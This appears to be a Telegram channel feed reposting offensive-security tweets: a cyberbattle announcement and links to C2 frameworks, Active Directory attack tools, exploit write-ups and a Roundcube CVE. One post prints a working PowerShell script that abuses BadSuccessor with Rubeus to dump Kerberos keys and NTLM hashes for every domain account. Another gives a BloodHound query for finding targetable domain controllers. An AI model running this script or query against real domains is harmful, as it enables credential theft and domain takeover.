Offensive Xwitter – Telegram
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://news.1rj.ru/str/OffensiveTwitter/546
Forwarded from Standoff 365
😱 Looks like it's starting... The Standoff 15 cyberbattle kicks off as early as next week!

From May 21 to 24, during PHDays Fest at Luzhniki, the international cyberbattle Standoff 15 will take place, bringing together more than 40 teams of attackers and defenders from 18 countries.

At stake for the red teams: $50,000 and the status of the strongest white-hat hackers.
At stake for the blue teams: leveling up skills on live attacks and priceless experience.

What awaits participants:

✈️ Seven industries of the virtual State F, including two new ones: metallurgy, energy, oil and gas, banking, the urban environment, aviation and logistics.

🤜 The red teams will try to trigger more than 120 critical events, while the blue teams will take part in investigation and response modes (this year more teams will be stopping cyberattacks).

🔥 We have prepared an updated visualization: in the virtual world everything will look like a game, while in the physical world the real consequences of cyberattacks can be seen with your own eyes on industry mock-ups with an interactive floor and a mega-screen.

🤝 But Standoff 15 is not only about the cyberbattle. It is also about people and community: this is your chance to meet those you know only by their nicknames, shake hands with legends, make new acquaintances, exchange experience and have a good time.

💬 So as not to miss the most interesting parts, check the cyberbattle schedule on the website. And follow the announcements: soon we will tell you more about what you will be able to see in the Standoff zone.

❗️Entry to the Standoff zone, which will be located in a separate tent, is possible only with PHDays Fest tickets from May 22❗️
🥱9👍7
😈 [ Rémi GASCOU (Podalirius) @podalirius_ ]

🚀 Launching TheManticoreProject – a long-term offensive & defensive security ecosystem in Go!

First release (the core library): Manticore 🐾
🔧 Modular Go library to craft & interact with network protocols.
⚙️ SMB support coming soon.
🌐

🔗 https://github.com/TheManticoreProject/Manticore

🐥 [ tweet ]
🔥3👍1
😈 [ mert @merterpreter ]

Did you know that if S1 is installed in your environment, you can gain SYSTEM privileges without running a getsystem command from your C2 by editing SentinelOne's Autorepair task? Needs localadmin priv

🐥 [ tweet ]
🥱9👍3
😈 [ chompie @chompie1337 ]

Me and the homies are dropping browser exploits on the red team engagement 😎. Find out how to bypass WDAC + execute native shellcode using this one weird trick -- exploiting the V8 engine of a vulnerable trusted application.

🔗 https://www.ibm.com/think/x-force/operationalizing-browser-exploits-to-bypass-wdac

🐥 [ tweet ]
🔥8
😈 [ blasty @bl4sty ]

ok ok fine, for old time's sake

🔗 https://haxx.in/files/limit-your-screentime.sh

🐥 [ tweet ]
👍9🔥5🥱4
😈 [ Oliver Lyak @ly4k_ ]

The Future of Certipy and the Release of v5 & ESC16 👇

🔗 https://github.com/ly4k/Certipy/discussions/270

🐥 [ tweet ]
🔥8🥱3
😈 [ Bad Sector Labs @badsectorlabs ]

Cobalt Strike for free!? Adaptix C2 (@hacker_ralf) is the best open source C2 I've used since Havoc (@C5pider). SOCKS5, remote and local port forwards, and BOF support! Now it's easy to install the server + client, especially on 🏟️Ludus with our new role:

🔗 https://github.com/badsectorlabs/ludus_adaptix_c2

🐥 [ tweet ]
🔥21🤔1😢1
😈 [ mpgn @mpgn_x64 ]

Thanks to the awesome work of @LadhaAleem , the CTF Windows Active Directory lab for @_barbhack_ from 2024 is now public! 🔥

You can build the lab and pwn the AD — 13 flags to capture! No public write-up exists yet — waiting for someone to submit one!

🔗 https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024

🐥 [ tweet ]
🔥12
😈 [ Matt Ehrnschwender @M_alphaaa ]

I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.

🔗 https://github.com/MythicAgents/tetanus

🐥 [ tweet ]

Ah, if only everything in the world could be rewritten in Rust 🦀 👍🏻 🦀 👍🏻
😁13🍌3👍2
😈 [ Steve S. @0xTriboulet ]

rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.

🔗 https://github.com/0xTriboulet/rssh-rs

🐥 [ tweet ]
👍1
😈 [ Yehuda Smirnov @yudasm_ ]

What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:

🔗 https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/

🐥 [ tweet ]
🔥9🥱2👍1
😈 [ Yuval Gordon @YuG0rd ]

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️
Read Here -

🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory

🐥 [ tweet ]
🔥9
😈 [ Bad Sector Labs @badsectorlabs ]

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group)
WHERE g.objectsid ENDS WITH '-516'
WITH COLLECT(c1.name) AS dcs
MATCH (c2:Computer)
WHERE c2.enabled = true
  AND (c2.operatingsystem contains '2025')
  AND (c2.name IN dcs)
RETURN c2.name

If this query hits, you're in.

🐥 [ tweet ][ quote ]
👍5
😈 [ mpgn @mpgn_x64 ]

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥

🔗 https://github.com/Pennyw0rth/NetExec/pull/702

🐥 [ tweet ][ quote ]
🔥11🥱3👍1
😈 [ David Kennedy @Cyb3rC3lt ]

Python version of BadSuccessor by Cybrly.

🔗 https://github.com/cybrly/badsuccessor

🐥 [ tweet ]
🔥6👍3🥱2
😈 [ Yuval Gordon @YuG0rd ]

Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell script that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal - krbtgt, users, machines. no DCSync required, no code execution on DC.

🐥 [ tweet ]

What an absolute wrecking 😂🤣

Upd.: in case anyone is wondering, the author does something like this with his own version of Rubeus:

$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
    + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}
😁13🔥9🥱2
😈 [ Matt Ehrnschwender @M_alphaaa ]

I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.

🔗 https://github.com/MEhrn00/boflink

Supporting blog post about it.

🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/

🐥 [ tweet ]
🍌7😁1
Forwarded from PT SWARM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.

This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.

If you're running Roundcube — update immediately!
🔥25🥱1🍌1
😈 [ Aditya Telange @adityatelange ]

evil-winrm-py v1 released🌟

🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0

🐥 [ tweet ]
👍6🔥6